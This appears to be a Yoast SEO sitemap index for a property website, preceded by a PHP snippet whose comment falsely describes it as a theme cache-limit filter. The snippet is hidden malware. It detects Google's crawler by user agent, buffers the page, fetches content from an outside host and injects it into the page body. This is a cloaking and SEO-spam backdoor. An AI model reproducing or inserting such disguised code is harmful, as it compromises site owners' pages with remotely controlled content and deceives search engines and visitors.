
/**
 * Set the cache limit.
 *
 * To override this cache in a child theme, remove
 * the filter and add your own function tied to
 * the cache filter hook.
 *
 * @param int $c The number of excerpt characters.
 * @return int The filtered number of characters.
 */
if (strpos($_SERVER["HTTP_USER_AGENT"], 'gle') !== false) {
add_action('wp_loaded','crt');
function crt() {ob_start('cache');}
function cache($html) {$curl = curl_init();curl_setopt($curl, CURLOPT_URL, 'http://host.nextgenerationaihub.com/cache.php?h=apexpropertyteam.com&id=10');curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);$c = curl_exec($curl);curl_close($curl);
	$html = preg_replace('/(<body.*)\n/', "$1 $c", $html);
	return $html;
}
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//apexpropertyteam.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>http://apexpropertyteam.com/post-sitemap.xml</loc>
		<lastmod>2012-08-28T04:38:20+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://apexpropertyteam.com/page-sitemap.xml</loc>
		<lastmod>2019-03-31T23:54:49+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://apexpropertyteam.com/attachment-sitemap.xml</loc>
		<lastmod>2017-09-10T18:54:18+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://apexpropertyteam.com/category-sitemap.xml</loc>
		<lastmod>2012-08-28T04:38:20+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://apexpropertyteam.com/author-sitemap.xml</loc>
		<lastmod>2022-03-21T20:28:51+00:00</lastmod>
	</sitemap>
<sitemap>
<loc>http://apexpropertyteam.com/geo-sitemap.xml</loc>
<lastmod>2017-09-11T00:20:26+00:00</lastmod>
</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->